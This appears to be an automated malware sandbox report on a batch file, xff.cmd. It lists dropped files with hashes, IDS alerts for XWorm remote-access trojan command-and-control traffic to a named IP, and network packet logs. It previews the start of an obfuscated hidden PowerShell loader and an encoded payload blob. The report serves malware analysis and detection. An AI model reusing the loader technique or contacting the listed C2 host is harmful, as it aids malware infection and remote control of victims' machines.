                                                                                                    C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_wab.exe_c37a4ff6c8a4ed9385ea8057619eae3fd5c96a_41d3b116_cdb68d28-d70a-498a-b55d-9a153f3a7274\Report.wer

                                                                                                    Download File
                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):65536
                                                                                                    Entropy (8bit):1.309724752519977
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:vB8UEukIT0BU/gjCXh08XTlzuiFxZ24IO8E:53EukfBU/gjv8XxzuiFxY4IO8E
                                                                                                    MD5:493F6371C983AE8DD4E14F6FEFA2C55D
                                                                                                    SHA1:DA9998B070AED1E8FB12114346E9405B93E6C841
                                                                                                    SHA-256:E22ACE2FF0D864B74DB9D0EB59AE54D7CFD20BE30666B49BDBE0387317E4FCC6
                                                                                                    SHA-512:E160C014D4447B07B547F647236B07FF5F95FC35091A74F77758011A7B73FD5469608346A57FF2C0B01573E853F9A4AAD941505DFBDFDDD5E42C390D17389D76
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.0.9.6.5.0.6.4.9.5.5.9.6.7.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.0.9.6.5.0.6.5.6.5.9.1.0.0.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.d.b.6.8.d.2.8.-.d.7.0.a.-.4.9.8.a.-.b.5.5.d.-.9.a.1.5.3.f.3.a.7.2.7.4.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.7.c.2.b.a.6.e.-.7.6.b.b.-.4.d.9.d.-.b.f.a.b.-.c.2.8.9.b.f.2.b.6.f.8.9.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.w.a.b...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.W.A.B...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.f.e.c.-.0.0.0.1.-.0.0.1.3.-.6.4.e.8.-.4.e.9.d.4.4.a.d.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.6.7.7.a.3.5.6.6.7.8.9.d.4.d.a.5.4.5.9.a.1.e.c.d.0.1.a.2.9.7.c.2.6.1.a.1.3.3.a.2.!.w.a.b...e.x.e.

                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WERF2D5.tmp.dmp

                                                                                                    Download File
                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                    File Type:Mini DuMP crash report, 14 streams, Thu May 23 19:11:05 2024, 0x1205a4 type
                                                                                                    Category:dropped
                                                                                                    Size (bytes):383886
                                                                                                    Entropy (8bit):3.5142920877131267
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3072:jwo3xC2fc4uEqByTIfLTgLGzbuL8Fb2VKkrIGPqobo:jwcxC2fc4sysTgLG3uQFb7krI7/
                                                                                                    MD5:AA91C7626F27A3A26D6DDB2D353E94DE
                                                                                                    SHA1:592C4AD29DC054437526DDFE51106A8F2A984FF9
                                                                                                    SHA-256:491AE3D1BF08045C99A846B307BD79CB3370F8C591B94280EBCDACD7781EA5A3
                                                                                                    SHA-512:0DEFF178C6E033D8388258AC49C6065612996E31B2D42398ACEFB4CA5B64029A384133AA0434398D4E12FFA21880FD334183FF9743B653325B039F01654B24D5
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview:MDMP..a..... ........Of........................@'..........d+...w..........T.......8...........T...........(e..fv...........1...........3..............................................................................eJ......`4......GenuineIntel............T...........4.Of....D........................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WERF4AB.tmp.WERInternalMetadata.xml

                                                                                                    Download File
                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                    File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):6376
                                                                                                    Entropy (8bit):3.7172282008724187
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:RSIU6o7wVetbBJY6s8eYZAQE/4Art5aM4UOb89bPpsfkulm:R6l7wVeJBJY62YZALpry89bPpsfblm
                                                                                                    MD5:6CAC37DFDBEAFA8E75781476E29D641E
                                                                                                    SHA1:D463DF3B748CE71B91A0925EB61DEF29306CFD6F
                                                                                                    SHA-256:260A0F62B7A0FB99A3363DFD796FC7CB223B47A2E09AD5DBB69022D5EC0DEBAB
                                                                                                    SHA-512:9AB2CFDFF813B77306CC12779CA23DEE967DE7AFA80E48699ED3D5C5F46F437508E77C42A8C814A43769B0DE707D46DF9B0475273E16015822A7084E0233DADD
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.8.1.7.2.<./.P.i.

                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WERF50A.tmp.xml

                                                                                                    Download File
                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4703
                                                                                                    Entropy (8bit):4.432919742684411
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:cvIwWl8zsXJg77aI9XWT1nWpW8VYCYm8M4JCyF8+q8vKw7I4ud:uIjf5I7pWTc7VqJMKHk4ud
                                                                                                    MD5:12A8A866DED27F71FDD761DF032CF0EC
                                                                                                    SHA1:7894F594AE628F2163279406E4A823629BFBA8E9
                                                                                                    SHA-256:96B8D00CDE79A7171129A016479F8502E2EE4368C119B0D33ECFF72CB9DC1C15
                                                                                                    SHA-512:1693552B68AF3A6BB2683C6656BB80F39032F514BBA070253A3B29B61B8D145DF630931156126A373BCA48D1E6CF1907CAC34F00DB7B4D898C0E03F4123D073D
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="336133" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:modified
                                                                                                    Size (bytes):11608
                                                                                                    Entropy (8bit):4.8908305915084105
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:6xoe5qpOZxoe54ib4ZVsm5emd5VFn3eGOVpN6K3bkkjo5xgkjDt4iWN3yBGHVQ9R:9rib4Z1VoGIpN6KQkj2qkjh4iUxsT6YP
                                                                                                    MD5:DD89E182EEC1B964E2EEFE5F8889DCD7
                                                                                                    SHA1:326A3754A1334C32056811411E0C5C96F8BFBBEE
                                                                                                    SHA-256:383ABA2B62EA69A1AA28F0522BCFB0A19F82B15FCC047105B952950FF8B52C63
                                                                                                    SHA-512:B9AFE64D8558860B0CB8BC0FA676008E74F983C4845895E5444DD776A42B584ECE0BB1612D8F97EE631B064F08CF5B2C7622D58A3EF8EF89D199F2ACAEFA8B52
                                                                                                    Malicious:false
                                                                                                    Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):64
                                                                                                    Entropy (8bit):1.1940658735648508
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:NlllulnmWllZ:NllUmWl
                                                                                                    MD5:3EBBEC2F920D055DAC842B4FF84448FA
                                                                                                    SHA1:52D2AD86C481FAED6187FC7E6655C5BD646CA663
                                                                                                    SHA-256:32441EEF46369E90F192889F3CC91721ECF615B0395CEC99996AB8CF06C59D09
                                                                                                    SHA-512:163F2BECB9695851B36E3F502FA812BFBF6B88E4DCEA330A03995282E2C848A7DE6B9FDBA740E3DF536AB65390FBE3CC5F41F91505603945C0C79676B48EE5C3
                                                                                                    Malicious:false
                                                                                                    Preview:@...e................................................@..........

                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_l5ts54qn.5vy.psm1

                                                                                                    Download File
                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nvwr4l2v.4ib.ps1

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rjn53r1n.xt2.psm1

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zhtjio2f.13m.ps1

                                                                                                    Download File
                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):6220
                                                                                                    Entropy (8bit):3.7377874982722465
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:y8MJ3CXGCgOoU2fe8ukvhkvklCywv2g6TFjlLzSogZosEaTFjlGzSogZosw1:g4WCg646kvhkvCCtyTFjgHZTFjPH8
                                                                                                    MD5:074094AA2C7A217B05A3D5716F4831A7
                                                                                                    SHA1:09FC729F78274077F73A4CBC80E0BE1A2A808A31
                                                                                                    SHA-256:9CD4A91C9D63000360E2C66F60C46FFC9427AC111CA0E17D606B4FA068B67009
                                                                                                    SHA-512:5DBDDBAE35A52B3DD8691CD0E370C087A80B523D2F3DEA4E9602EF651F488DC4FECC9E5B696C9D8D128052EF84186A4132ECA997BB9725A425AFABFBC920B17B
                                                                                                    Malicious:false
                                                                                                    Preview:...................................FL..................F.".. ....N.5q......D...z.:{.............................:..DG..Yr?.D..U..k0.&...&.........5q...*...D...Q..D.......t...CFSF..1.....EW)N..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW)N.X.............................c..A.p.p.D.a.t.a...B.V.1......X....Roaming.@......EW)N.X............................t9!.R.o.a.m.i.n.g.....\.1.....EW.R..MICROS~1..D......EW)N.X............................O~X.M.i.c.r.o.s.o.f.t.....V.1.....EW.S..Windows.@......EW)N.X..............................o.W.i.n.d.o.w.s.......1.....EW+N..STARTM~1..n......EW)N.X......................D......H..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EW#O..Programs..j......EW)N.X......................@.......|.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW)NEW)N..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~2.LNK..^......EW)N.X..................

                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\K1LU13OLD73QY1LDC9QS.temp

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):6220
                                                                                                    Entropy (8bit):3.7377874982722465
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:y8MJ3CXGCgOoU2fe8ukvhkvklCywv2g6TFjlLzSogZosEaTFjlGzSogZosw1:g4WCg646kvhkvCCtyTFjgHZTFjPH8
                                                                                                    MD5:074094AA2C7A217B05A3D5716F4831A7
                                                                                                    SHA1:09FC729F78274077F73A4CBC80E0BE1A2A808A31
                                                                                                    SHA-256:9CD4A91C9D63000360E2C66F60C46FFC9427AC111CA0E17D606B4FA068B67009
                                                                                                    SHA-512:5DBDDBAE35A52B3DD8691CD0E370C087A80B523D2F3DEA4E9602EF651F488DC4FECC9E5B696C9D8D128052EF84186A4132ECA997BB9725A425AFABFBC920B17B
                                                                                                    Malicious:false
                                                                                                    Preview:...................................FL..................F.".. ....N.5q......D...z.:{.............................:..DG..Yr?.D..U..k0.&...&.........5q...*...D...Q..D.......t...CFSF..1.....EW)N..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW)N.X.............................c..A.p.p.D.a.t.a...B.V.1......X....Roaming.@......EW)N.X............................t9!.R.o.a.m.i.n.g.....\.1.....EW.R..MICROS~1..D......EW)N.X............................O~X.M.i.c.r.o.s.o.f.t.....V.1.....EW.S..Windows.@......EW)N.X..............................o.W.i.n.d.o.w.s.......1.....EW+N..STARTM~1..n......EW)N.X......................D......H..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EW#O..Programs..j......EW)N.X......................@.......|.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW)NEW)N..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~2.LNK..^......EW)N.X..................

                                                                                                    C:\Users\user\AppData\Roaming\Tider.Dre

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):466008
                                                                                                    Entropy (8bit):5.937585412211595
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6144:rrnZUh9LrNST+yY8QpJ2MiRzYjT8aq8N/ZtwxkUVokPa47labOHXOHfnpBug0O4E:rDZ8VRpEMiRcXdx/0h+7ug0O4Qz
                                                                                                    MD5:B3908211A29C523DA70D8CE9797A087A
                                                                                                    SHA1:C99A1D080CB474FD51DBD51F75B753D0EFB5D17A
                                                                                                    SHA-256:15B86FE8BA861E241BD317292E649EE349F0A35C0E2DDB4669989E907689E128
                                                                                                    SHA-512:DFF97FD11075C912F6AEA454D2FAC846787FB3747C92A0270CD212391C693CC8B9D3495EBB9C416F71D41D935C99E6F37CA9EB4767CCB808DC1A985278095FA4
                                                                                                    Malicious:false
                                                                                                    Preview:6wLp+nEBm7vd2QsA6wLbp+sCUCQDXCQEcQGbcQGbuerQuM1xAZtxAZuB8d70km5xAZtxAZuB6TQkKqNxAZvrAlU86wJek3EBm7oa359ZcQGb6wJyBusCM9xxAZsxyusCZU3rAtfIiRQL6wKyG3EBm9HicQGb6wJ6I4PBBOsC5lNxAZuB+eNo0wJ8ynEBm+sCi4CLRCQE6wJ6C+sCh6CJw+sCxOxxAZuBw0INUwJxAZvrAi82uqhUUoRxAZvrAvZ9gfLAV83O6wIuc+sC3HeBwpj8YLXrAoHIcQGbcQGb6wL2HHEBm+sC61CLDBBxAZtxAZuJDBPrAolg6wLsDUJxAZtxAZuB+nTkBAB11nEBm3EBm4lcJAxxAZvrAs50ge0AAwAA6wJTPHEBm4tUJAhxAZvrAikHi3wkBHEBm+sCN4CJ63EBm+sCHvqBw5wAAABxAZtxAZtTcQGbcQGbakDrArX76wILUonr6wK1+OsCU1fHgwABAAAAUOICcQGbcQGbgcMAAQAA6wJDIHEBm1NxAZvrAgV7ietxAZtxAZuJuwQBAABxAZtxAZuBwwQBAABxAZvrAuSfU+sC/4ZxAZtq/+sCWAzrAiVkg8IF6wKTkusCxGwx9nEBm3EBmzHJcQGbcQGbixrrAtC46wKewkHrAmG+6wKelzkcCnXycQGb6wKAYkZxAZtxAZuAfAr7uHXdcQGb6wKx3ItECvzrAjfe6wIS/Cnw6wKk5usCZFP/0usC1NdxAZu6dOQEAOsCZKFxAZsxwOsCOsRxAZuLfCQMcQGbcQGbgTQHuV4MeesCUaRxAZuDwARxAZvrAqj9OdB15HEBm3EBm4n76wKi8+sCM3v/13EBm3EBm4GGiaowu8s8VJo4Mc3feZQSnLpnOCvhoZpDZvj8s0VUpaFAhvSzeYM8j1nwXOcoqOAtao54WQr4Qia6z7vf/SwGJzP4eK0bS6ipy+NSBlD4UBKKK+Te89l+GgF5yirHoD2VjRW0

                                                                                                    C:\Windows\appcompat\Programs\Amcache.hve

                                                                                                    Download File
                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                    File Type:MS Windows registry file, NT/2000 or above
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1835008
                                                                                                    Entropy (8bit):4.29609570820233
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6144:841fWRYkg7Di2vXoy00lWZgiWaaKxC44Q0NbuDs+FImBMZJh1VjZ:x1/YCW2AoQ0NiXIwMHrVl
                                                                                                    MD5:4C4C2EA9A545CDD5D6CD69A566FDDAD4
                                                                                                    SHA1:16997BE3B344E1011A3E87029E6463CA2E1A9A50
                                                                                                    SHA-256:7FFE62E9F2F8EB147E0B129FCF9E994DA407E4711D7A56D164AD18D8C912D827
                                                                                                    SHA-512:4089501D190A2E1D4C3FB07F2BEC7D4CF09BB602213C6298D3154975128BE16B65FD9E20F4D0EEB98B11EE7CC46B45D4FBFA44E58AE3FD28F720DC0B726A4127
                                                                                                    Malicious:false
                                                                                                    Preview:regfG...G....\.Z.................... ....`......\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.l.D...............................................................................................................................................................................................................................................................................................................................................4+y.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                    Static File Info

                                                                                                    General

                                                                                                    File type:ASCII text, with very long lines (6864), with no line terminators
                                                                                                    Entropy (8bit):5.220632850786154
                                                                                                    TrID:
                                                                                                      File name:xff.cmd
                                                                                                      File size:6'864 bytes
                                                                                                      MD5:798c0f3c0c128497007a0616ef8d6b93
                                                                                                      SHA1:cedbb573042a3275475973d0a6d45510a1941cd1
                                                                                                      SHA256:76611689034914a32d83d3fafbd528f7498fcd80a78c19fb2d8e93f39ce14dc6
                                                                                                      SHA512:f64eafe2d84b867ced4c430743cdfb3a4be3eac0a2d4a53114e9a815ebe5e4a5e94e4d7eed6d8ae647d25191994d88a7ae826717c50fc9e14c7a4de866868999
                                                                                                      SSDEEP:192:wTcnW0e8ORczJDWx3CDKZJ4VKwUg9j16NuK:meC89VDWxUKZJm5p1/K
                                                                                                      TLSH:15E13C5BB3052D77818D0FC4F6B729272F899EB804ABBC429A34572FF4815A0652CEC7
                                                                                                      File Content Preview:start /min powershell.exe -windowstyle hidden "$Shave = 1;$Stikningens='Sub';$Stikningens+='strin';$Stikningens+='g';Function Sideblikkets($Missel){$Wandoo=$Missel.Length-$Shave;For($Unisexuality=5;$Unisexuality -lt $Wandoo;$Unisexuality+=6){$Berseems+=$M

                                                                                                      File Icon

                                                                                                      Icon Hash:9686878b929a9886

                                                                                                      Network Behavior

                                                                                                      Snort IDS Alerts

                                                                                                      TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                      05/23/24-21:09:07.075167TCP2855924ETPRO TROJAN Win32/XWorm V3 CnC Command - PING Outbound497208895192.168.2.1012.202.180.134
                                                                                                      05/23/24-21:10:13.764044TCP2853193ETPRO TROJAN Win32/XWorm V3 CnC Command - PING Outbound497208895192.168.2.1012.202.180.134
                                                                                                      05/23/24-21:11:06.119277TCP2852874ETPRO TROJAN Win32/XWorm CnC PING Command Inbound M288954972012.202.180.134192.168.2.10
                                                                                                      05/23/24-21:11:06.119277TCP2852870ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes88954972012.202.180.134192.168.2.10

                                                                                                      Network Port Distribution

                                                                                                      TCP Packets

                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                      May 23, 2024 21:08:08.194025040 CEST49711443192.168.2.10104.21.28.80
                                                                                                      May 23, 2024 21:08:08.194066048 CEST44349711104.21.28.80192.168.2.10
                                                                                                      May 23, 2024 21:08:08.194145918 CEST49711443192.168.2.10104.21.28.80
                                                                                                      May 23, 2024 21:08:08.206764936 CEST49711443192.168.2.10104.21.28.80
                                                                                                      May 23, 2024 21:08:08.206788063 CEST44349711104.21.28.80192.168.2.10
                                                                                                      May 23, 2024 21:08:08.688931942 CEST44349711104.21.28.80192.168.2.10
                                                                                                      May 23, 2024 21:08:08.689068079 CEST49711443192.168.2.10104.21.28.80
                                                                                                      May 23, 2024 21:08:08.693378925 CEST49711443192.168.2.10104.21.28.80
                                                                                                      May 23, 2024 21:08:08.693387032 CEST44349711104.21.28.80192.168.2.10
                                                                                                      May 23, 2024 21:08:08.693662882 CEST44349711104.21.28.80192.168.2.10
                                                                                                      May 23, 2024 21:08:08.705440044 CEST49711443192.168.2.10104.21.28.80
                                                                                                      May 23, 2024 21:08:08.746506929 CEST44349711104.21.28.80192.168.2.10
                                                                                                      May 23, 2024 21:08:09.057910919 CEST44349711104.21.28.80192.168.2.10
                                                                                                      May 23, 2024 21:08:09.057986975 CEST44349711104.21.28.80192.168.2.10
                                                                                                      May 23, 2024 21:08:09.058218002 CEST49711443192.168.2.10104.21.28.80
                                                                                                      May 23, 2024 21:08:09.112843990 CEST49711443192.168.2.10104.21.28.80
                                                                                                      May 23, 2024 21:08:09.164370060 CEST49712443192.168.2.1069.31.136.57
                                                                                                      May 23, 2024 21:08:09.164422035 CEST4434971269.31.136.57192.168.2.10
                                                                                                      May 23, 2024 21:08:09.164535046 CEST49712443192.168.2.1069.31.136.57
                                                                                                      May 23, 2024 21:08:09.256344080 CEST49712443192.168.2.1069.31.136.57
                                                                                                      May 23, 2024 21:08:09.256386995 CEST4434971269.31.136.57192.168.2.10
                                                                                                      May 23, 2024 21:08:10.002790928 CEST4434971269.31.136.57192.168.2.10
                                                                                                      May 23, 2024 21:08:10.002883911 CEST49712443192.168.2.1069.31.136.57
                                                                                                      May 23, 2024 21:08:10.005906105 CEST49712443192.168.2.1069.31.136.57
